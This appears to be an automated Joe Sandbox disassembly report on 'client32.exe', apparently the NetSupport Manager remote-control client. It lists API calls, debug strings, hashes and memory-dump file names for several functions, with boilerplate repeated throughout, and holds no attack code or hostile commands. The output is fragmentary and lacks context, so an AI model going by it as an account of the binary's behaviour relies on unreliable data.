Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Valid
String ID:
API String ID: 1304828667-0
Opcode ID: 07d1f4d55114712ce09944c96b79fb0dbf7eda27ec4e79ff2eec5c2a7d7a1562
Instruction ID: 676b2b3de2148593dc90d10c3e1cfc66e629af1c8c3f0d5084bd27d7bb4b02fe
Opcode Fuzzy Hash: 07d1f4d55114712ce09944c96b79fb0dbf7eda27ec4e79ff2eec5c2a7d7a1562
Instruction Fuzzy Hash: 6A417372E0422A9FDB11CFA4CC85BAEBBB8EF44755F1041A9FC15E7248D7319901CBA1

Function 11009940 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11009B25
_strtok.LIBCMT ref: 11009B63
_malloc.LIBCMT ref: 11009B7D

Strings

nbytes <= sizeof (extra_bytes), xrefs: 11009B46
Send EV_CONFIGSET from %s@%d, xrefs: 11009C9A
..\ctl32\AUDIO.CPP, xrefs: 11009B41, 11009B90, 11009C95
*extra_bytes, xrefs: 11009B07, 11009C78
Audio, xrefs: 11009AAC, 11009AC6, 11009B0C, 11009C7D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$_malloc
String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
API String ID: 665538724-3655815180
Opcode ID: a58a1bc8f62514e0485890523dd3a61df5c19061fa5e1776a74e8e672784eb4a
Instruction ID: f212e9d89bc86df04ab54337e3c978262b149d1453360f4219e9cb9ecc55d9ac
Opcode Fuzzy Hash: a58a1bc8f62514e0485890523dd3a61df5c19061fa5e1776a74e8e672784eb4a
Instruction Fuzzy Hash: 22A13774E056299FEB61CF25C880BDAF7F0AF59344F5080E9D88DA7241E770AA85CF91

Function 1106D2C0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 175sleeptimeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(00000000,?,?,?,111B83A0), ref: 1106D358
Sleep.KERNEL32(00000064,?,?,111B83A0), ref: 1106D3A2
DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D430
DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D436
DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D43C
DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D442
DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D448
DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D44E

Part of subcall function 11103160: DeleteCriticalSection.KERNEL32(75A77AB0,2F623E72,?,75A77AA0,00000000,?,00000000,1116FF88,000000FF,?,110B7556), ref: 111031AA
Part of subcall function 11103160: EnterCriticalSection.KERNEL32 ref: 111031F5
Part of subcall function 11103160: SetEvent.KERNEL32(00000248), ref: 1110321E
Part of subcall function 11103160: CloseHandle.KERNEL32(00000248), ref: 11103252
Part of subcall function 11103160: WaitForSingleObject.KERNEL32(00000290,000000FF), ref: 11103260
Part of subcall function 11103160: CloseHandle.KERNEL32(00000290), ref: 1110326D

Strings

..\ctl32\Connect.cpp, xrefs: 1106D3C5
idata->dialup == NULL, xrefs: 1106D3CA

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Delete$CloseHandle$EnterEventKillObjectSingleSleepTimerWait
String ID: ..\ctl32\Connect.cpp$idata->dialup == NULL
API String ID: 161544936-3355235989
Opcode ID: 79aafff9eca0d463449024df2412cdea9a595f767407fb07140581a44bbbffa4
Instruction ID: 36ddb0504334873c216a30337e86c42547ebe3cf26056ee2141bf84180dda08e
Opcode Fuzzy Hash: 79aafff9eca0d463449024df2412cdea9a595f767407fb07140581a44bbbffa4
Instruction Fuzzy Hash: BE51F4B9A046059FD750DBA4C884BAFF7F9AF88308F01415DE95A97280DB74B904CBA1

Function 11141090 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111409E0: IsWindow.USER32(FFFFC554), ref: 111409ED
Part of subcall function 111409E0: IsWindow.USER32(D8458D00), ref: 111409F7

IsWindow.USER32(00010001), ref: 111410DB
CreateWindowExA.USER32(00000000,AtlAxWin100,about:blank,50300000,80000000,80000000,00000000,00000000,00010001,?,11000000,00000000), ref: 11141138
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 1114114D

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

UpdateWindow.USER32(?), ref: 11141233
ShowWindow.USER32(?,00000005), ref: 1114123F

Strings

!IsInit(), xrefs: 111410CA
AtlAxWin100, xrefs: 11141131
about:blank, xrefs: 1114112C
IsWindow(hwndPar), xrefs: 111410EC
..\CTL32\WBObject.cpp, xrefs: 111410C5, 111410E7

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Message$CreateErrorExitLastProcessSendShowUpdatewsprintf
String ID: !IsInit()$..\CTL32\WBObject.cpp$AtlAxWin100$IsWindow(hwndPar)$about:blank
API String ID: 3766702438-2471897277
Opcode ID: 6ea1114ac6ccd361845ebdefb1f7c21c818829f08718dc757a911fc34c2f1f58
Instruction ID: 89a1e59c23e27b181d28c6aea5168aafdb7a37f1fac42e7899e5da6e401d876f
Opcode Fuzzy Hash: 6ea1114ac6ccd361845ebdefb1f7c21c818829f08718dc757a911fc34c2f1f58
Instruction Fuzzy Hash: EF5153B9B00645AFDB04DFA9CD85FAAFBE9EB49604F108528F519D7784E730E900CB51

Function 110F3950 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 155threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

GetLastError.KERNEL32(Client,00000000,00000001,00000000,00000000,1105649A,00000001,580913), ref: 110F3A56
GetCurrentThreadId.KERNEL32 ref: 110F3A8C
GetCurrentThreadId.KERNEL32 ref: 110F3A9A

Strings

*Log_%d, xrefs: 110F397C
Client, xrefs: 110F3999, 110F3A24
nstrings <= 4, xrefs: 110F3A6E
LogWhileConnected, xrefs: 110F3A1F
PLATFORM.CPP, xrefs: 110F3A69
Event. %s, xrefs: 110F3AB6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentThread$ErrorLast__wcstoi64
String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
API String ID: 2021241812-3565238984
Opcode ID: ed8d07a8ca7adf8a3058e207953be0e50a5633198018f87a67f2deef4bb9106d
Instruction ID: d55be7df3a69900bf20a33ae532095b48253e2b26db93481f9648db565e52d9e
Opcode Fuzzy Hash: ed8d07a8ca7adf8a3058e207953be0e50a5633198018f87a67f2deef4bb9106d
Instruction Fuzzy Hash: 61512A75E04156AFDB00DF62CC86FAFBBA4EF85728F104129FD159B280E675A940C7A1

Function 110FB090 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110FB0BE
EnterCriticalSection.KERNEL32(111DBDA4), ref: 110FB0D1
GetTickCount.KERNEL32 ref: 110FB0D7
GetTickCount.KERNEL32 ref: 110FB223
LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110FB22C

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h, xrefs: 110FB16E, 110FB19A
Warning. took %d ms to get simap lock, xrefs: 110FB0E6
TerminateVistaUI, xrefs: 110FB1AF
Warning. simap lock held for %d ms, xrefs: 110FB23C
IsA(), xrefs: 110FB173, 110FB19F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CriticalSection$EnterLeave
String ID: IsA()$TerminateVistaUI$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
API String ID: 956672424-1347840706
Opcode ID: 9c62ae52d175db9da93bd6ceb374a3324fc362af68b10af75ace81d4a3c5c9fa
Instruction ID: 4ec3a70211b026e7dbc4eeca6b9a79e7af00bbee3c8de0b8751296dd8e751a9c
Opcode Fuzzy Hash: 9c62ae52d175db9da93bd6ceb374a3324fc362af68b10af75ace81d4a3c5c9fa
Instruction Fuzzy Hash: 2E519C79E0065AAFDB04DFA5D884B9EF7F4FF55318F0481A8E815A7251E730AD44CB90

Function 110753F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,11079302), ref: 11075430
BeginDeferWindowPos.USER32(00000008), ref: 11075443
GetTopWindow.USER32(?), ref: 11075457
GetClassNameA.USER32(00000000,00000000,00000020), ref: 11075477
GetWindowLongA.USER32(00000000,00000000), ref: 110754AC
GetWindow.USER32(00000000,00000002), ref: 110754C0
CopyRect.USER32(00000002,11079302), ref: 110754DF
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000017), ref: 11075527
EndDeferWindowPos.USER32(00000000), ref: 11075535

Strings

NSMCoolbar, xrefs: 11075479

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$DeferRect$BeginClassClientCopyLongName
String ID: NSMCoolbar
API String ID: 1900817757-4124301854
Opcode ID: 721ac4e266f96a4a850d5aaf4f4e1e8e70e9fe7eb07aeeafc09c1b7f71e7420c
Instruction ID: 697ac5a8752ed506828de34cf2428e8b9a6e2033c0f369928a21e8fa57bdad73
Opcode Fuzzy Hash: 721ac4e266f96a4a850d5aaf4f4e1e8e70e9fe7eb07aeeafc09c1b7f71e7420c
Instruction Fuzzy Hash: 7741AF75E00699AFDB01CF64D8C5AEDFBF5EF49318F1081A9EC95A7240EB329900CB54

Function 110CD040 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

Part of subcall function 110D37D0: EnterCriticalSection.KERNEL32(111D8C5C,11017228,2F623E72,?,?,?,111B83A0,11175D28,000000FF,?,11019222), ref: 110D37D1

__CxxThrowException@8.LIBCMT ref: 110CD0C0

Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3

gethostbyname.WSOCK32(111D8BD0,2F623E72,00000000,?,00000000), ref: 110CD0D5
WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174E50,000000FF), ref: 110CD0E1
_memmove.LIBCMT ref: 110CD10B
htons.WSOCK32(00000000), ref: 110CD131
socket.WSOCK32(00000002,00000001,00000000), ref: 110CD141
WSAGetLastError.WSOCK32 ref: 110CD14F
connect.WSOCK32(?,?,00000010,?,00000000,000000FF,111D8BE8,00000000,000000FF), ref: 110CD183
WSAGetLastError.WSOCK32 ref: 110CD18E

Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,2F623E72,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A

Strings

Connect() the socket is not closed, xrefs: 110CD08D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionException@8RaiseSectionThrow_memmoveconnectgethostbynamehtonssocket
String ID: Connect() the socket is not closed
API String ID: 2474459257-1125742345
Opcode ID: 4828a50d2772984c1f1240718b356724044de2df25197ee5af4063c6df3829bd
Instruction ID: ccd0812ce5c4b190832bbbc4611eee6a3b7bdca2a255a4473ecf135b367f79d4
Opcode Fuzzy Hash: 4828a50d2772984c1f1240718b356724044de2df25197ee5af4063c6df3829bd
Instruction Fuzzy Hash: 40417F75D00609AFDB10DFA4C984B9EF7B4FF48B14F10465EE826A7280EB34AA04CF94

Function 11059170 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 126sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B

wsprintfA.USER32 ref: 110591DE
CloseHandle.KERNEL32(?), ref: 11059228
WaitForInputIdle.USER32(?,00001388), ref: 1105923D
Sleep.KERNEL32(00000064), ref: 11059271

Strings

Cobrowse WaitForInputIdle ret %x, xrefs: 11059244
NSMCobrMain, xrefs: 11059284
NSMCobrProxy, xrefs: 11059250
client32.exe /cobrowse, xrefs: 110591CC
Cobrowse FindWindow ret %x, xrefs: 1105925F
%s%s, xrefs: 110591D8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$CloseFileHandleIdleInputModuleNameSleepWaitwsprintf
String ID: %s%s$Cobrowse FindWindow ret %x$Cobrowse WaitForInputIdle ret %x$NSMCobrMain$NSMCobrProxy$client32.exe /cobrowse
API String ID: 1983868302-3988794623
Opcode ID: 6c1afc4eae45db93175f885578682ff7c5dcd0a4c08b2a706085d4d78dcd34c2
Instruction ID: 64ff9cb93a9663605cfd89a277c98985d389e2c617dc2113b1a8173dc2104267
Opcode Fuzzy Hash: 6c1afc4eae45db93175f885578682ff7c5dcd0a4c08b2a706085d4d78dcd34c2
Instruction Fuzzy Hash: ED41B275E00305AFDB60DF64CC85FDAB7F5EB49748F0085A9FA19A7280EB70A900CB61

Function 11015570 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 123registrytimeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11015588
LoadCursorA.USER32(00000000,00007F00), ref: 110155E4
RegisterClassA.USER32(00000003), ref: 110155FE

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101565F
UpdateWindow.USER32(00000000), ref: 110156AD
SetTimer.USER32(00000000,00000001,?,00000000), ref: 110156E0

Strings

m_hWnd, xrefs: 11015674, 1101569C, 110156CA
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11015697, 110156C5
..\ctl32\NSMIdentifyWnd.cpp, xrefs: 1101560B, 1101566F
NSMIdentifyWnd, xrefs: 110155F7, 11015658

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 1905683801-829434836
Opcode ID: d3c1f65075277e3a1e6953d20af43a3d98eef37c275395219bf04279b5829960
Instruction ID: 5d7763ff052535f15a435ab75112d1ab5b6a36c9cbb3a02e710fd65c9b1f1a2f
Opcode Fuzzy Hash: d3c1f65075277e3a1e6953d20af43a3d98eef37c275395219bf04279b5829960
Instruction Fuzzy Hash: 174131B5E00205AFDB11CFA9DC84BDEFBF8EB48308F10852AE518A7644E775A540CF95

Function 1102B140 Relevance: 16.7, APIs: 1, Strings: 10, Instructions: 197sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,000000D0,11043E30,00000000), ref: 1102B2F4

Strings

CLIENT32.CPP, xrefs: 1102B345
_License, xrefs: 1102B1B5
gMain.cfg == m_cfg, xrefs: 1102B34A
Client, xrefs: 1102B241, 1102B381
SetChannel(%s), oldchan=<%s>, xrefs: 1102B273
Eval, xrefs: 1102B1E8
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1102B1D6, 1102B25F, 1102B293, 1102B2B8, 1102B30D, 1102B367
*channel, xrefs: 1102B23C, 1102B37C
licensee, xrefs: 1102B1B0
IsA(), xrefs: 1102B1DB, 1102B264, 1102B298, 1102B2BD, 1102B312, 1102B36C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
